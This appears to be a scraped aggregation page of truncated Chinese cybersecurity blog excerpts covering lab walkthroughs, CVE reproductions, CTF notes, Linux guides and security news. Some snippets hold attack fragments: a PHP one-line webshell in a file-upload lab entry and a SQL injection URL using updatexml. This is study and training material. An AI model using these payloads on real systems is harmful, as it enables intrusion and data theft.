你还能想起自己8岁的时候，每天都在玩什么吗？可能是在楼下和小朋友一起捉迷藏？在家追一本连载的漫画书？又或者在电脑上玩种菜偷菜的小游戏？ 当同龄人还在沉迷于这些比较“基础”的小游戏时，有这样一批和互联…

英飞凌在车辆信息安全方面上应用

如今，网络安全在多个层面影响着我们每个人。我们的专业工作、个人生活，甚至我们的汽车，都依赖于复杂软件上运行的连接和技术。随着信息技术日益融入我们的日常生活，我们对后续信息系统的依赖性也与日俱增。反过来，这些…

任意文件读取及漏洞复现

文章目录渗透测试漏洞原理任意文件读取1. 任意文件读取概述1.1 漏洞成因1.2 漏洞危害1.3 漏洞分类1.4 任意文件读取1.4.1 文件读取1.4.2 任意文件读取1.4.3 权限问题 1.5 任意文件下载1.5.1 一般情况1.5.2 PHP实现1.5.3 任意文件下载 2. 任意文件读取攻防2.1 路径过滤2.1.1 过…

linux常用命令及解释大全（二）

目录前言一、文件的权限二、文件的特殊属性三、打包和压缩文件四、查看文件内容五、文本处理 5.1 grep 5.2 sed 5.3 其它总结前言本篇文章接linux常用命令及解释大全（一）继续介绍了一部分linux常用命令，包括文件的权限&a…

配置类安全问题学习小结

目录一、前言二、漏洞类型目录一、前言二、漏洞类型 2.1 Strict Transport Security Not Enforced 2.2 SSL Certificate Cannot Be Trusted 2.3 SSL Anonymous Cipher Suites Supported 2.4 "Referrer Policy”Security 头值不安全 2.5 “Content-Security-…

misc corrupt

1.打开之后是01二进制 2.利用python二进制转hex或者16进制 print(hex(int(二进制01,2))) 3.利用winHex 4.解码base64

敏感信息防泄漏：透明加密与通信内容安全策略深度解析

随着信息技术的迅猛发展，计算机和网络已经成为了我们日常生活中不可或缺的工具，用于办公、通信和协作。尽管这些信息系统提高了工作效率，但也引发了一系列与信息安全相关的问题，例如如何有效地保护存储在这些系统中的关键数据&…

OSCP系列靶场-Esay-Sumo

OSCP系列靶场-Esay-Sumo 总结 getwebshell : nikto扫描 → 发现shellshock漏洞 → 漏洞利用 → getwebshell 提权思路 : 内网信息收集 → 内核版本较老 →脏牛提权准备工作启动VPN 获取攻击机IP → 192.168.45.194 启动靶机获取目标机器IP → 192.168.190.87 信息收…

Vulnhub: Masashi: 1靶机

kali：192.168.111.111 靶机：192.168.111.236 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.236查看80端口的robots.txt提示三个文件 snmpwalk.txt内容，tftp服务在1337端口 sshfolder.txt内容&#xff0c…

suricata命令和规则语法

Suricata User Guide — Suricata 7.0.1-dev documentation 一、命令行选项 1、常用启动选项 -c <path> 指定配置文件suricata.yaml所在路径 -i <interface> 指定要监控的网卡名称或ip地址 -T 测试配置文件是否正确 -v 设定日志级别，包括-v: INFO -vv…

linux常用命令及解释大全（三）

目录前言一、字符设置和文件格式转换二、文件系统分析三、初始化一个文件系统四、备份五、光盘六、网络总结前言本篇文章继续介绍了一部分linux常用命令，包括字符设置和文件格式转换，文件系统分析，初始化一个文件系统&…

组件安全以及漏洞复现

组件安全 1. 概述 A9:2017-使⽤含有已知漏洞的组件 A06:2021-Vulnerable and Outdated Components 组件（例如：库、框架和其他软件模块）拥有和应用程序相同的权限。如果应用程序中含有已知漏洞的组件被攻击者利用，可能会造成…

网络渗透day13-PHP基础1

PHP（Hypertext Preprocessor）是一种流行的服务器端脚本语言，用于开发动态网站和应用程序。下面是PHP的一些基础语法和常见特性： PHP标记： PHP代码通常包含在<?php和?>标记之间。例如： <?php //…

2.8 PE结构：资源表详细解析

在Windows PE中，资源是指可执行文件中存放的一些固定不变的数据集合，例如图标、对话框、字符串、位图、版本信息等。PE文件中每个资源都会被分配对应的唯一资源ID，以便在运行时能够方便地查找和调用它们。PE文件中的资源都被组织成一个树形结…

【漏洞库】Fastjson_1.2.24_rce

文章目录漏洞描述漏洞编号漏洞评级影响版本漏洞复现- 利用工具- 漏洞环境- 漏洞扫描- 漏洞验证- 深度利用- GetShell- EXP 编写漏洞挖掘- 指纹信息修复建议- 漏洞修复漏洞原理漏洞描述 Fastjson 存在反序列化远程代码执行漏洞，当应用或系统使用 Fastjson 对由…

Weblogic（CVE-2017-10271）与 Struts2(s2-045) 反序列化漏洞复现

文章目录 Java 反序列化漏洞复现weblogic环境搭建漏洞复现 Struts2(s2-045)环境搭建漏洞复现**漏洞利用** Java 反序列化漏洞复现 weblogic Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞（CVE-2017-10271） Weblogic的WLS Security组…

【打靶】vulhub打靶复现系列3---Chronos

【打靶】vulhub打靶复现系列3---Chronos 一、主机探测结合之前的方法（arp探测、ping检测），因为我们的靶机和攻击机都在第二层，所以打靶时候我们更依赖arp协议 tips：我在运行期间发现，netdiscover窗口没关…

网安周报｜Chaes恶意软件的新Python变种针对银行和物流行业

1、Chaes恶意软件的新Python变种针对银行和物流行业银行和物流业正受到名为Chaes的恶意软件的重新设计变种的冲击。Chaes于2020年首次出现，它的目标是拉丁美洲（尤其是巴西）的电子商务客户，以窃取敏感的财务信息。该恶意软件的最新…

crAPI靶场学习记录

靶场搭建 [靶场下载地址](我fork了一份) docker安装，笔者是用的wsldocker. [lab0:**初始账户 **] 1. 注册一个账户，邮箱为[APIqq.com]，密码为Admin123 1. 登陆后访问对应IP的8025端口，接收邮件获取车辆信息。 [lab1:**访问其…

CTF入门学习笔记——Crypto密码（编码）

文章目录 CTF入门学习笔记——Crypto密码（编码）BASE编码BASE16BASE32BASE64BASE85[AFCTF 2018]BASE Uuencode编码[SWPUCTF 2021 新生赛]crypto8 Rabbit编码Rabbit URL编码URL Quoted-Printable编码Quoted-Printable 待补充 CTF入门学习笔记——Crypto密码…

压缩包系列

1、zip伪加密一个zip文件由三部分组成：压缩源文件数据区压缩源文件目录区压缩源文件目录结束标志。伪加密原理：zip伪加密是在文件头中加密标志位做修改，然后在打开时误被识别成加密压缩包。压缩源文件数据区： 50 4B 03 04&a…

网安周报|Mixin Network 云服务商数据库遭到攻击，涉案金额约 2 亿美元

1、Mixin Network 云服务商数据库遭到攻击，涉案金额约 2 亿美元 Mixin Network是一个开源的数字资产点对点交易网络，今天在Twitter上宣布，由于该平台遭受了黑客攻击，存款和取款立即暂停。据报道，该攻击的目标是Mixin云…

棱镜七彩参编！开源领域4项团体标准正式发布

近日，中电标2023年第27号团体标准公告正式发布，《T/CESA 1270.2-2023 信息技术开源治理第 2 部分：企业治理评估模型》、《T/CESA 1270.3-2023 信息技术开源治理第 3 部分：社区治理框架》、《T/CESA 1270.5-2023 信息技术开源…

DDoS检测防御实现方案

流量采集模式通过分光器将流量直接镜像到攻击检测器，收包采用DPDK库。当前整机流量、源IP信息、连接数、连接内容(五元组等)的信息汇聚当发生告警时采样原始数据包， 采用固定采样算法基于检测对象的TCP syn ack psh ack established的个数、流量…

轻松教会你搭建Vulhub靶场环境

在Ubantu系统上搭建靶场环境一、ubantu系统准备 1.更新安装列表 sudo apt-get update 2.安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3.安装pip 检查pip是否安装 pip -V 安装pip apt install python3-pip 或者 apt install pip 再次检查pip是否成…

文件上传漏洞第十六关十七关

第十六关第十七关第十六关直接上传php文件判断限制方式： 同第十五关白名单限制第十六关源码： 代码逻辑判断了后缀名、content-type，以及利用imagecreatefromgif判断是否为gif图片，最后再做了一次二次渲染二次渲染图片马&…

fastjson-BCEL不出网打法原理分析

FastJson反序列化漏洞与原生的 Java 反序列化的区别在于，FastJson 反序列化并未使用 readObject 方法，而是由 FastJson 自定一套反序列化的过程。通过在反序列化的过程中自动调用类属性的 setter 方法和 getter 方法，将JSON 字符串还原成对…

对验证码的识别爆破

声明：该系列文章首发于公众号：Y1X1n安全，转载请注明出处！本公众号所分享内容仅用于每一个爱好者之间的技术讨论及教育目的，所有渗透及工具的使用都需获取授权，禁止用于违法途径，否则需自行承担&…

暴露你系统安全的黑暗角落：常见端口漏洞大合集！

目录前言一、远程管理端口 1.22 端口（SSH） 2.23 端口（Telnet） 3.3389 端口（RDP） 4.5632 端口（Pcanywhere） 5.5900 端口（VNC） 二、Web中间件/服务端口 6.109…

手机木马远程控制复现

目录目录前言系列文章列表渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2 思维导图 1，实验涉及复现环境 2,Android模拟器环境配置 2.1,首先从官网上下载雷电模拟器 2.2,安装雷电模拟器 2.3, 对模拟器网络进行配置 2.3.1,为什么要进行配置…

E055-web安全应用-File Inclusion文件包含漏洞初级

课程名称： E055-web安全应用-File Inclusion文件包含漏洞初级课程分类： web安全应用实验等级: 中级任务场景: 【任务场景】小王接到磐石公司的邀请，对该公司旗下网站进行安全检测，经过一番检查发现了该论坛的某个页面存…

E053-web安全应用-Brute force暴力破解初级

课程分类： web安全应用实验等级: 中级任务场景: 【任务场景】小王接到磐石公司的邀请，对该公司旗下的网站进行安全检测，经过一番检查发现该论坛的后台登录页面上可能存在万能密码漏洞，导致不知道账号密码也能登录后台&am…

Yakit工具篇：子域名收集的配置和使用

简介(来自官方文档) 子域名收集是指通过各种技术手段，收集某个主域名下所有的子域名列表。子域名是指在主域名前面添加一级或多级名称的域名。例如，对于主域名example.com，其子域名可以是www.example.com、mail.example.com、blog.example.c…

GLEIF携手TrustAsia，共促数字邮件证书的信任与透明度升级

TrustAsia首次发布嵌入LEI的S/MIME证书，用于验证法定实体相关的电子邮件账户的真实与完整性 2023年10月，全球法人识别编码基金会（GLEIF）与证书颁发机构（CA）TrustAsia通力合作，双方就促进LEI在数…

MySQL绕过WAF实战技巧

一、前言本人喜欢遇到好的东西，乐于分享，关注freebuf有段时间了，写过两篇文章，每次写写文章，不仅仅是为了挣点稿费。而是通过此平台能够认识一些安全圈的小伙伴，互相学习，共同进步。在安全行业…

网络工程师知识点7

111、IS-IS路由器的三种类型？ Level-1路由器（只能创建level-1的LSDB） Level-2路由器（只能创建level-2的LSDB） Level-1-2路由器（路由器默认的类型，能同时创建level-1和level-2的LSDB）…

内网隧道代理技术（二十三）之 DNS隧道反弹Shell

DNS隧道反弹Shell DNS隧道 DNS协议是一种请求、应答协议，也是一种可用于应用层的隧道技术。DNS隧道的工作原理很简单，在进行DNS查询时，如果查询的域名不在DNS服务器本机缓存中，就会访问互联网进行查询，然后返回结果。如果在互联网上有一台定制的服务器，那么依靠DNS协议…

phpstudy_2016-2018_rce_backdoor 漏洞复现

phpstudy_2016-2018_rce_backdoor 漏洞复现 Remote Command Execute 打开 bp 打开代理浏览器访问 php 页面回到 bp 查看 http 历史，找到刚刚访问的 php 页面发送到 Repeater 转到 Repeater php 页面请求内容加 Accept-Charset: 修改 Accept-Encodi…

【软考】6.1 信息安全及技术

《信息安全和信息系统安全》信息安全系统的体系架构网络安全空间五大要素：认证、权限、完整、加密、不可否认（抵赖） 信息安全含义及属性信息安全三要素：保密性、完整性、可用性最小授权原则：该有什么权限&#xf…

安全典型配置（四）使用自反ACL实现单向访问控制案例

【微|信|公|众|号：厦门微思网络】安全典型配置（一）使用ACL限制FTP访问权限案例_厦门微思网络的博客-CSDN博客安全典型配置（二）使用ACL限制用户在特定时间访问特定服务器的权限-CSDN博客安全典型配置&#xff0…

【网络】HTTPS讲解（侧重于加密、秘钥、证书的讲解）

HTTPS讲解前言正式开始安全HTTP和HTTPS的关系什么是加密和解密为什么要加密运营商劫持中间人常⻅的加密⽅式对称加密⾮对称加密数据摘要数字签名HTTPS 的⼯作过程⽅案 1 - 只使⽤对称加密（不可靠）⽅案 2 - 只使⽤⾮对称加密（不可靠&#x…

中间件安全-CVE复现WeblogicJenkinsGlassFish漏洞复现

目录服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish漏洞复现中间件-Weblogic安全问题漏洞复现CVE_2017_3506漏洞复现中间件-JBoos安全问题漏洞复现CVE-2017-12149漏洞复现CVE-2017-7504漏洞复现中间件-Jenkins安全问题漏洞复现CVE-2017-1000353漏…

生成克隆钓鱼网站与对win7进行后渗透操作

目录目录前言系列文章列表思维导图 1，实验涉及复现环境 2，CS的介绍 2.1,CS的简介 2.2,CS的主要功能 3，CS的安装 3.1,将cobalt_strike_4.5文件夹放到kali中 3.1,放入过程中的注意事项 3.2,如图所示 4,配置工具 4.1,进入c…

业务安全详解

文章目录一、业务安全概述1.1 业务安全现状1.1.1 业务逻辑漏洞1.1.2 黑客攻击的目标二、业务安全测试2.1 业务安全测试流程2.1.1 测试准备2.1.2 业务调研2.1.3 业务建模2.1.4 业务流程梳理2.1.5 业务风险点识别2.1.6 开展测试2.1.7 撰写报告三、业务安全经典场景3.1 业务…

“技能兴鲁”职业技能大赛-网络安全赛项-学生组初赛 WP

Crypto BabyRSA 共模攻击题目附件： from gmpy2 import * from Crypto.Util.number import *flag flag{I\m not gonna tell you the FLAG} # 这个肯定不是FLAG了，不要交这个咯p getPrime(2048) q getPrime(2048) m1 bytes_to_long(bytes(flag.e…

命令执行相关函数及各类命令执行绕过技巧

相关函数 （命令注入） 命令执行的绕过

中间件安全：Apache 目录穿透.（CVE-2021-41773）

中间件安全：Apache 目录穿透.（CVE-2021-41773） Apache 的 2.4.49、2.4.50 版本对路径规范化所做的更改中存在一个路径穿越漏洞，攻击者可利用该漏洞读取到Web目录外的其他文件，如系统配置文件、网站源码等&#xff0c…

CTF-Web(3)文件上传漏洞

笔记目录 CTF-Web(2)SQL注入CTF-Web(3)文件上传漏洞 1.WebShell介绍 (1)一句话木马定义一种网页后门，以asp、php、jsp等网页文件形式存在的一种命令执行环境，而一句话木马往往只有一行WebShell代码。作用： 攻击获得网站控制权限查看、修改…

【黑产攻防道03】利用JS参数更新检测黑产的协议破解

任何业务在运营一段时间之后都会面临黑产大量的破解。验证码和各种爬虫的关系就像猫和老鼠一样, 会永远持续地进行博弈。极验根据十一年和黑产博弈对抗的经验，将黑产的破解方式分为三类： 1.通过识别出验证码图片答案实现批量破解验证，即图片…

“破解我！“---160个CrackMe练习001-Acid buen.exe

文章目录前言题目分析破解过程Serial/Name验证方式爆破注册机追码 Serial验证前言想开个系列，160个Crackme的练习，这个在52pojie上有个精华帖总结，写的特别好，推荐！写这个系列主要还是记录一下自己的学习记录&…

JAVA安全入门之反射

反射对于反射这个概念来说，直白的讲就是： 对象可以通过反射获取他的类，类可以通过反射拿到所有⽅法（包括私有），拿到的⽅法可以调⽤而众所周知 JAVA 是一门静态语言，我们通过反射就可以达到动…

CTF —— 网络安全大赛（这不比王者好玩吗？）

前言随着大数据、人工智能的发展，人们步入了新的时代，逐渐走上科技的巅峰。 \ ⚔科技是一把双刃剑，网络安全不容忽视，人们的隐私在大数据面前暴露无遗，账户被盗、资金损失、网络诈骗、隐私泄露，种种迹象…

用友GRP-U8 SQL注入漏洞复现

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一、产品介绍成长型企业平台，以全新URP为平台，…

致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC]

文章目录致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC] 0x01 前言免责声明：请勿利用…

Linux提权方法总结

1、内核漏洞提权利用内核漏洞提取一般三个环节：首先对目标系统进行信息收集，获取系统内核信息及版本信息第二步，根据内核版本获取对应的漏洞以及exp 第三步，使用exp对目标进行攻击，完成提权注：此处可…

2.3 - 网络协议 - ICMP协议工作原理，报文格式，抓包实战

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 ICMP协议 1、ICMP协议工作原理2、ICMP协议报文格式…

护网蓝队初级面试题摘录（下）

小王学习录 1.设备误报如何处理？2.讲一下TOP10都有哪些3.SQL注入的原理和漏洞产生的原因？4.SQL注入的类型盲注类型： 5.简单讲一下防范SQL注入的方法和原理6.SQL注入有哪些绕过姿势？7.SQL注入攻击有哪些危害？6.XSS&…

汽车网络安全渗透测试概述

目录 1.汽车网络安全法规概述 1.1 国外标准 1.2 国内标准 2.汽车网络安全威胁分析 2.1 汽车网络安全资产定义 2.2 汽车网络安全影响场景及评级示例 3.汽车网络安全渗透测试描述 3.1 参考法规 3.2 渗透测试内容 4.小结 1.汽车网络安全法规概述近年来，汽车…

CNVD-C-2023-76801：用友NC uapjs RCE漏洞复现[附POC]

文章目录用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801) [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801) [附POC] 0x01 前言免责声明：请勿利用…

CVE-2023-0179-Nftables整型溢出

前言 Netfilter是一个用于Linux操作系统的网络数据包过滤框架，它提供了一种灵活的方式来管理网络数据包的流动。Netfilter允许系统管理员和开发人员控制数据包在Linux内核中的处理方式，以实现网络安全、网络地址转换（Network Address Transl…

excel如何加密（excel加密的三种方法）

Excel是一款广泛使用的办公软件，有时候我们需要对一些重要的Excel文件进行加密，以保证文件的安全性。下面将介绍3种常用的Excel加密方法。方法一：通过路径文件-另存为-工具-常规选项-设置打开或修改权限密码（密码只可以使数字、字…

Web安全：Vulfocus 靶场搭建.（漏洞集成平台）

Web安全：Vulfocus 靶场搭建.（漏洞集成平台） Vulfocus 是一个包含了多种漏洞靶场的镜像。每个靶场都有具体的漏洞环境和攻击点。Vulfocus 的靶场包括了 Web 安全漏洞、系统安全漏洞、网络安全漏洞、密码学漏洞等多种类型。通关这个靶场我们可以…

【ATTCK】基于ATTCK识别网络钓鱼攻防战法

一、基于ATT&CK的钓鱼攻防战法（1） 通过ATT&CK识别钓鱼攻击可以采取以下步骤： 1. 收集数据：使用ATT&CK收集有关钓鱼攻击的数据，包括攻击者的行为模式、使用的工具和技术等。这可以通过监控网络流量、收集…

微信@all bug复现及原理分析

1、复现条件： 1、Windows PC 端微信 2、自建一个群聊拥有群管权限可以所有人废话不多说，直接上图所有人剪切后，到另一个群中，引用任意一个群里成员的消息，并将刚才剪切的粘贴至此，发送便可完成非群…

sqli-labs(Less-5) updatexml闯关

updatexml() - Xpath类型函数 1. 确定注入点闭合方式确认为字符型注入 2. 爆出当前数据库的库名 http://127.0.0.1/sqlilabs/Less-5/?id1 and updatexml(~,concat(~,(select database())),~) --3. 爆出当前用户名 http://127.0.0.1/sqlilabs/Less-5/?id1 and updatexml…

Python-7-函数作用域，高阶函数，闭包，装饰器

漏洞复现--天融信TOPSEC两处远程命令执行

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

Connect-The-Dots_2

Connect-The-Dots_2 一、主机发现和端口扫描主机发现，靶机地址192.168.80.148 arp-scan -l端口扫描 nmap -A -p- -sV 192.168.80.148开放端口 21/tcp open ftp vsftpd 2.0.8 or later 80/tcp open http Apache httpd 2.4.38 ((Debian)) 111/tcp …

CVE-2023-22515：Atlassian Confluence权限提升漏洞复现 [附POC]

文章目录 Atlassian Confluence权限提升(CVE-2023-22515)漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 Atlassian Confluence权限提升(CVE-2023-22515)漏洞复现 [附POC] 0x01 前言免责声明&…

网站遇到DDOS攻击怎么办？

最近我的网站不幸又遇到了几乎是我见到过的最大一次 DDoS 攻击，并且几乎是没有反映的时间，直接接到腾讯云的短信通知“运营商封堵”，直接造成几个小时无法访问，解封后再次遭受到大流量 DDoS 攻击，再次被“腾讯云平台封…

网络异常检测

随着社交网络、视频流、点对点技术、云计算和 SaaS 的出现，可以肯定地说，现代企业的好坏取决于他们的网络，尤其是在它们提供的带宽和安全性方面。无论是银行保护其数据免遭盗窃，还是商业组织保护其网络免受安全威胁和攻击&#xf…

克服海外邮件收发难题，Coremail提供全方位解决方案

客户背景某3C电子企业成立于2007年，总部位于深圳，公司在国内多个重点城市均设有研发和生产基地。作为一家规模庞大、技术领先的国家高新技术企业，该企业始终致力于锂离子电池的研究与发展，为新能源行业提供专业、系统的材料解决…

中间件安全：JBoss 反序列化命令执行漏洞.（CVE-2017-7504）

中间件安全：JBoss 反序列化命令执行漏洞.（CVE-2017-7504） JBoss 反序列化漏洞，该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中，其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试…

中间件安全：JBoss 反序列化命令执行漏洞.（CVE-2017-12149）

中间件安全：JBoss 反序列化命令执行漏洞.（CVE-2017-12149） JBoss 反序列化漏洞，该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中，其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试…

elFinder ZIP 参数注入导致命令注入（CVE-2021-32682）

漏洞描述 elFinder 是一个用于 Web 的开源文件管理器，使用 jQuery UI 用 JavaScript 编写。在 elFinder 2.1.48 及更早版本中发现一个参数注入漏洞。此漏洞可能允许攻击者在托管 elFinder PHP 连接器的服务器上执行任意命令，即使配置最少也是如此。这…

网络安全（黑客技术）从了解到精通

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

用友 NC Cloud jsinvoke 任意文件上传

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一、漏洞概述用友 NC Cloud 中存在 jsinvoke 接口的任意文件上传漏洞…

网络爬虫与指纹浏览器：解析指纹浏览器对网络爬虫的作用

网络爬虫在信息搜集、数据挖掘等领域起着重要作用。然而，传统爬虫往往面临被目标网站封禁的风险。本文将介绍指纹浏览器对网络爬虫的作用，以及指纹浏览器如何帮助爬虫降低封禁风险。网络爬虫面临的挑战网络爬虫是一种自动化程序，用于从互联…

金融银行业更适合申请哪种SSL证书？

在当今数字化时代，金融行业的重要性日益增加。越来越多的金融交易和敏感信息在线进行，金融银行机构必须采取必要的措施来保护客户数据的安全。SSL证书作为一种重要的安全技术工具，可以帮助金融银行机构加密数据传输，验证网站身份&…

Android各版本引入的重要安全机制介绍

本文简单列举Android各个版本引入的一些主要安全机制。 Android 4.4（KitKat） - SELinux（Security-Enhanced Linux）：引入了强制访问控制框架，对系统的进程和文件进行了更严格的访问控制。 Android 5.0&…

网络安全威胁——跨站脚本攻击

跨站脚本攻击 1. 定义2. 跨站脚本攻击如何工作3. 跨站脚本攻击类型4. 如何防止跨站脚本攻击 1. 定义跨站脚本攻击（Cross-site Scripting，通常称为XSS），是一种典型的Web程序漏洞利用攻击，在线论坛、博客、留言板等共享…

2023全国职业院校技能大赛信息安全管理与评估正式赛（模块三CTF）

全国职业院校技能大赛高等职业教育组信息安全管理与评估 \任务书\ 模块三网络安全渗透、理论技能与职业素养极安云科专注技能竞赛，包含网络建设与运维和信息安全管理与评估两大赛项，及各大CTF，基于两大赛项提供全面的系统性培训&#xf…

基础漏洞流量分析

基础漏洞流量分析 sql注入 sql注入原理 SQL 注入的攻击行为可以描述为通过用户可控参数中注入 SQL 语法，破坏原有 SQL 结构，达到编写程序时意料之外结果的攻击行为。其成因可以归结为以下两个原因叠加造成的: 程序员在处理程序和数据库交互时&#x…

信息收集 - 渗透测试流程

目录渗透测试基本概念渗透测试的执行标准 (PTES)渗透测试基本流程与方法渗透测试工具渗透测试风险规避渗透测试方案与报告法律相关规定（建议了解，防止直接不小心进去进修）根据中华人民共和国刑法第285条和286条的规定：违反国家规定，侵入国家事务、国防建设、尖端科学技…

Bwapp学习笔记

1.基本sql语句 #求绝对值 select abs(-1) from dual; #取余数 select mod(10,3); #验证show databases结果是取之于schemata表的 show databases; select schema_name from information_schema.schemata; #查询当前的数据库 select database(); -- 查询数据库版本 s…

计算机网络概述（上）——“计算机网络”

各位CSDN的uu们好呀，好久没有更新小雅兰的计算机网络的专栏啦，而且期末考试也要考计算机网络，所以，小雅兰就来写计算机网络的内容啦！！！下面，让我们进入计算机网络概述的世界吧&#…

Upload-Labs-Linux

题目 1.打开靶机随便上传一个图片，查看get请求发现/upload/XXX.jpg 2.创建一个脚本文件命名为flag.php.jpg,并上传脚本文件内容： <?php eval($_POST[1234])?> 3上传后复制文件get请求的链接并打开蚁剑连接密码为123 双击链接 4&#xff…

Weblogic任意文件上传漏洞（CVE-2018-2894）

漏洞描述： Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞，进而获取服务器权限。 Oracle 7月更新中，修复了Weblogic Web Service Test Page中一处任意文件上传漏洞，Web Service Test Page 在 ‘生产模式’ 下默认不开启…

网络安全制度

文章目录前言一、等级保护制度是基础二、科学的网络安全制度体系1、建立科学的网络安全等级保护制度2、建立科学的关键信息基础设施安全保护制度3、建立科学的数据安全保护制度三、法律、政策、标准，三方衔接1、三个制度在法律层面协调一致2、三个制度在政策层面协调一致3、三…

Pkt2flow-将pcap文件按照网络流量切割

将pcap文件按照网络流量切割 Github项目地址：https://github.com/caesar0301/pkt2flow 该程序的内部函数使用 4 元组（src_ip、dst_ip、src_port、dst_port） 将数据包分隔为 TCP 或 UDP 流。每个流都将保存到一个 pcap 中以 4 元组命名的文…

不忘初心，聚焦安全 —— 一名码龄15年的老程序员2023总结

2023总结 1. 整体回顾2. 亮点工作3. 未来展望 1. 整体回顾作为一名码龄超15年的老程序员，虽然2008年就注册了CSDN博客，但是从2020年疫情以来才开始偶尔写写博客，前面两年虽然写了不少，但基本属于自娱自乐，粉丝量和阅…

AS-V1000产品介绍：支持GA/T1400视图库标准（可通过GA/T1400接入海康、华为、大华等图传前端设备，实现图传功能）

目录一、概述二、AS-V1000视频监控管理平台的特点二、视频监控平台通过GA/T1400接入前端设备 （一）接入华为GA/T1400前端设备 （二）接入大华GA/T1400前端设备 （三）接入海康威视GA/…

小H靶场笔记：DC-5

DC-5 January 5, 2024 10:44 AM Tags：screen提权 Owner：只惠摸鱼信息收集探测靶机ip，大概率为192.168.199.135，且开放端口为80和111 扫描端口80，111相关服务、版本、操作系统、漏洞信息 sudo nmap -sS -O -sV 19…

文件上传漏洞（CVE-2022-23043）

简介 CVE-2022-23043是一个与Zenario CMS 9.2文件上传漏洞相关的安全漏洞。该漏洞被定义为文件的不加限制上传，攻击者可以利用这个漏洞上传webshell以执行任意命令。利用这个漏洞的攻击者暂无特定情况。要利用此漏洞，攻击者首先需要访问Zenario CMS的管…

【读书】《白帽子讲web安全》个人笔记Ⅰ-1

目录前言： 第1章我的安全世界观 1.1 Web安全简史 1.1.1中国黑客简史 1.1.2黑客技术的发展历程 1.1.3web安全的兴起 1.2黑帽子，白帽子 1.3返璞归真，揭秘安全的本质 1.4破除迷信，没有银弹 1.5安全三要素 1.6如何实施安…

安全防御之入侵检测与防范技术

安全防御中的入侵检测与防范技术主要涉及到入侵检测系统（IDS）和入侵防御技术（IPS）。入侵检测系统（IDS）是一种对入侵行为自动进行检测、监控和分析的软件与硬件的组合系统。IDS通过从计算机网络或系统中的若…

【重点问题回顾】攻击面发现揭秘直播

一、云图极速版细节沟通 1. 云图极速版中的极速体现在哪使用调优过的攻击面发现策略，无需用户配置攻击面发现策略，开箱即用仅需录入目标企业名称，即可开始攻击面发现，无需配置其他参数通过社交平台推送告警详情，第一…

2、安全开发-Python-Socket编程端口探针域名爆破反弹Shell编码免杀

用途：个人学习笔记，欢迎指正！ 目录主要内容： 一、端口扫描(未开防火墙情况) 1、Python关键代码: 2、完整代码：多线程配合Queue进行全端口扫描二、子域名扫描三、客户端，服务端Socket编程通信cmd命…

与宝塔面板相比，牧云主机管理助手的优势在哪里？

宝塔免费版，1panel 用户，从知乎看到网友发的帖，说牧云主机管理助手是一款SaaS形态的服务器运维工具，目前完全免费了。已经用了半个多月，浅谈一下自己的感受： 1、SaaS化部署，安装方便一条命…

WAF（Web应用防火墙）全面解析

Web应用防火墙（WAF）是确保网络安全的重要工具，尤其在保护Web应用免受各种网络攻击方面发挥着至关重要的作用。以下是关于WAF的各方面详细介绍： 定义和目的 WAF是一种特殊类型的防火墙，专门设计用于监视、过滤和阻挡进…

【pwn】hitcontraining_uaf --堆利用之uaf

先检查程序的保护情况 32位程序，堆栈不可执行看ida 经典的菜单题，根据题目的uaf，判断该题有uaf漏洞，看一下delete函数两次free没置空指针，确实存在uaf漏洞，再看一下add函数和print函数 add函数这里&…

红队打靶练习:BOB: 1.0.1

目录信息收集 1、netdiscover 2、nmap 3、nikto 4、whatweb 目录探测 1、dirb 2、gobuster 3、dirsearch WEB 主页： robots.txt 其他页面反弹shell 提权系统信息收集 jc账户本地提权信息收集 1、netdiscover ┌──(root㉿ru)-[~/kali] └…

linux 的nobody是什么用户？对安全有没有影响？

目录一、前言：nobody是不是可疑用户？ 二、Linux系统中的nobody用户？ 二、有nobody用户存在，安全吗？ 一、前言：nobody是不是可疑用户？ 在前面一篇文章“Linux安全问题,如何查看哪…

DC-5靶机做题记录

靶机下载地址： 链接：https://pan.baidu.com/s/1aZRB-hqvqLlGUmAPFljnIA?pwdelxg 提取码：elxg 参考： DC5官方地址：https://www.vulnhub.com/entry/dc-5,314/DC5靶机地址：https://download.vulnhub.com/d…

前端JS加密与Buspsuite的坦诚相待

